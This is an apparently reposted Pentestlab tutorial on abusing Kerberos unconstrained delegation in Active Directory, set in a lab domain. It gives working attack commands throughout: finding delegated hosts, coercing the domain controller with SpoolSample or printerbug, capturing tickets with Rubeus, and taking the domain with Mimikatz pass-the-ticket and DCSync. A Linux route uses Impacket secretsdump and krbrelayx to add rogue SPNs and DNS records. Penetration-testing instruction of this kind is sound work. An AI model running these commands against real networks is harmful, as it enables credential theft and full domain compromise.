Security
Headlines
HeadlinesLatestCVEs

Headline

Unconstrained Delegation

Microsoft to support scenarios where users authenticate via Kerberos to one system and information needs to be updated on another system implemented unconstrained delegation. This… Continue reading → Unconstrained Delegation

Pentestlab
#web#ios#mac#windows#microsoft#linux#ldap#samba#oauth#auth

Microsoft to support scenarios where users authenticate via Kerberos to one system and information needs to be updated on another system implemented unconstrained delegation. This was implemented in windows ecosystems since Windows 2000. Systems which are configured for unconstrained delegation will have the TGT (Ticket Granting Ticket) stored into LSASS memory for the purpose of enabling the user to access the end resource.

More specifically, the domain controller places a copy of the user’s TGT into the service ticket. When the user’s service ticket (TGS) is provided to the server for service access the server opens the TGS and places the user’s TGT into the LSASS for later use allowing the server to impersonate the user. Obtaining the ticket could lead to domain escalation as the ticket might belong to the machine account of the domain controller or a high privilege account like the domain administrator. For a computer to authenticate on behalf of other services (unconstrained delegation) two conditions are required:

  1. Account has the TRUSTED_FOR_DELEGATION flag in the User Account Control (UAC) flags.
  2. User account has not the NOT_DELEGATED flag set which by default non domain accounts have this flag.

The following image represents a host in the Active Directory which is configured for unconstrained delegation:

Trust Computer for Delegation

Discovery

Identification of systems which are configured for unconstrained delegation is trivial from a PowerShell console. Executing the module “Get-ADComputer” and filtering the results to display the output of the property “trustedfordelegation” will determine whether the host which operations are performed is configured for unconstrained delegation.

Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description

Unconstrained Delegation – Retrieve Active Directory Computers

Other interesting properties that can be enumerated are the:

  • TrustedToAuthForDelegation
  • msDS-AllowedToDelegateTo
  • PrincipalsAllowedToDelegateToAccount

Get-ADComputer “Hive” -Properties TrustedForDelegation, TrustedToAuthForDelegation,msDS-AllowedToDelegateTo,PrincipalsAllowedToDelegateToAccount

Unconstrained Delegation – Computer Properties

Using the same module querying the “userAccountControl” attribute can provide the same results.

Get-ADComputer -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=524288)"

Unconstrained Delegation – User Account Control

Alternatively, the “Get-NetComputer” module from PowerView can be used to discover hosts which are configured for unconstrained delegation.

Get-NetComputer -Unconstrained

Unconstrained Delegation – PowerView

Coerce Authentication

There are multiple protocols which can coerce the machine account of the domain controller to authenticate with other hosts on the system such as spoolsample and encrypting file services remote procedure call. However, capturing the ticket of the machine account requires Rubeus to run in monitor state mode.

Rubeus.exe monitor /monitorinterval:10 /targetuser:DC$ /nowrap

Rubeus – TGT Monitoring

Execution of the printer bug will coerce the domain controller to authenticate with the workstation which is configured for unconstrained delegation.

SpoolSample.exe dc hive

Unconstrained Delegation – SpoolSample

The ticket granting ticket (TGT) of the domain controller machine account will received and captured by Rubeus.

Rubeus – DC$ Machine Account Ticket

The ticket will be in base64 format and therefore cannot be used directly. However, from a PowerShell console execution of the command below will convert the ticket and write the contents to a file with the .kirbi extension.

[IO.File]::WriteAllBytes("C:\Users\pentestlab.PURPLE\Desktop\DC.kirbi", [Convert]::FromBase64String(“Base64”))

Convert Base64 Ticket to Kirbi

Using the Pass the Ticket within Mimikatz the current user account will get high privilege rights on the domain controller. This can be verified by using the DCSync technique in order to dump the NTLM hash of the domain admin account and get command execution via pass the hash on the domain controller.

kerberos::ptt DC.kirbi
lsadump::dcsync /domain:purple.lab /user:Administrator

Mimikatz – Pass the Ticket

HTTP Authentication

it is not uncommon for administrators on the domain to use PowerShell scripts in order to perform remote tasks on hosts or construct HTTP requests which can be executed periodically in a server for business reasons. In the event that these scripts are executed under the context of elevated credentials Kerberos tickets can also generated and extracted from the LSASS process for domain escalation.

Invoke-WebRequest http://ca.purple.lab -UseDefaultCredentials -UseBasicParsing

HTTP Request

The ticket of the administrator account will be cached into the memory of the LSASS process. Mimikatz can interact with this process and has a specific module which will attempt to retrieve cached tickets.

privilege::debug
sekurlsa::tickets

Unconstrained Delegation – Administrator TGT

Tickets can be exported locally by executing the command below directly from Mimikatz.

sekurlsa::tickets /export

Mimikatz – Export Administrator Ticket

The triage action of Rubeus will display in a table the available Kerberos tickets which are stored in memory and their associated service.

Rubeus triage

Rubeus – Triage

Since a ticket which belongs to the domain administrator exists in cache, executing the command below will dump all the tickets for that user.

Rubeus.exe dump /user:Administrator

Rubeus – Dump Administrator Ticket

Rubeus – Dump Ticket

The ticket of the domain administrator can be used on the current system or transferred to another host in order to be used with Mimikatz or Rubeus that support importing Kerberos tickets into memory.

kerberos::ptt C:\Users\pentestlab.PURPLE\[email protected]

Mimikatz – Pass the Ticket

Executing “klist” will validate that the ticket was cached in memory of the current session.

klist

List Kerberos Ticket

Using the ticket access to the domain controller has been achieved and can be confirmed by listing the contents of the C: drive.

dir \\dc.purple.lab\C$

DC Access

Non-Domain Joined

As with the majority of the techniques which include Kerberos abuse, unconstrained delegation can be conducted from a non domain joined systems as supporting tooling to replicate the steps performed above exists. Impacket has a python script which can be used to identify systems on the domain which are configured for delegation if valid domain credentials are supplied.

python3 findDelegation.py purple.lab/pentestlab:Password1234

Unconstrained Delegation – Impacket

Once administrative access has been achieved Impacket module “secretsdump” can be used to retrieve the NTLM hash of the machine account which its host is configured for unconstrained delegation.

secretsdump.py [email protected]

Secretsdump

Secretsdump – Machine Account hashes

The krbrelayx is a set of python tools which was developed by Dirk-Jan Mollema and can be utilized to abuse unconstrained delegation effectively from Linux based systems. Using the NTLM hash of the machine account (HIVE$) to authenticate with the active directory with the “addspn” python script to bind to the domain controller and retrieve information about the modification target.

python3 addspn.py -u purple\\Hive\$ -p aad3b435b51404eeaad3b435b51404ee:27b6e0dd98a862dc13456ca1c0f7d128 -s HOST/kali.purple.lab -q dc.purple.lab

krbrelayx – addspn

Using the same command with the “–additional” flag the service principal name of the machine account will modified via the “msDS-AdditionalDnsHostName” attribute to include the “HOST/kali.purple.lab” service principal name.

python3 addspn.py -u purple\\Hive\$ -p aad3b435b51404eeaad3b435b51404ee:27b6e0dd98a862dc13456ca1c0f7d128 -s HOST/kali.purple.lab dc.purple.lab --additional

SPN Modification

Coercing the machine account of the domain controller to authenticate with the host require the DNS name and not the IP address. Since the attack will executed from a non domain joined host the DNS server will not have any DNS record. However, utilizing the “dnstool” will add a DNS record on the domain controller for the host by executing the command below:

python3 dnstool.py -u purple\\Hive\$ -p aad3b435b51404eeaad3b435b51404ee:27b6e0dd98a862dc13456ca1c0f7d128 -r kali.purple.lab -d 10.0.0.3 --action add dc.purple.lab

Unconstrained Delegation – DNS Record

Similarly the DNS record can be added on the domain controller by creating an A record to resolve 10.0.0.3 (Kali IP address) to “kali2.purple.lab“.

python3 dnstool.py -u purple\\Hive\$ -p aad3b435b51404eeaad3b435b51404ee:27b6e0dd98a862dc13456ca1c0f7d128 -r kali2.purple.lab -a add -t A -d 10.0.0.3 10.0.0.1

krbrelayx – DNS Record

Executing “nslookup” will validate the DNS entry and that the host now resolves to “kali1.purple.lab“.

nslookup kali1.purple.lab 10.0.0.1

nslookup

The “krbrelayx” can take the AES key of the machine account that was dumped earlier in order to be used for Kerberos authentication. Two listeners will be created by default SMB and HTTP.

sudo python3 krbrelayx.py -aesKey b4dc28d2ec920d4f87bc1d610f2b6e8e1114aec5135797482020893b3aad03c6

krbrelayx – Listeners

The next step is to coerce the machine account of the domain controller to authenticate with the host which the listeners are running. The printer bug (SpoolSample) or PetitPotam can be used using the NTLM hash of the machine account which is configured for unconstrained delegation and the host name which the listeners are running.

python3 printerbug.py -hashes aad3b435b51404eeaad3b435b51404ee:27b6e0dd98a862dc13456ca1c0f7d128 purple.lab/Hive\[email protected] kali.purple.lab

krbrelayx – PrinterBug

Once the authentication is triggered the ticket of the domain controller machine account will retrieved and saved in the cache of the host. This is because the authentication of the domain controller to the arbitrary host will performed using Kerberos authentication. Since the ticket belongs to an elevated account of the domain controller domain escalation has been achieved and domain hashes could be retrieved via the DCSync technique.

krbrelayx – Kerberos Ticket

References

  • https://adsecurity.org/?p=1667

Post navigation

Pentestlab: Latest News

Web Browser Stored Credentials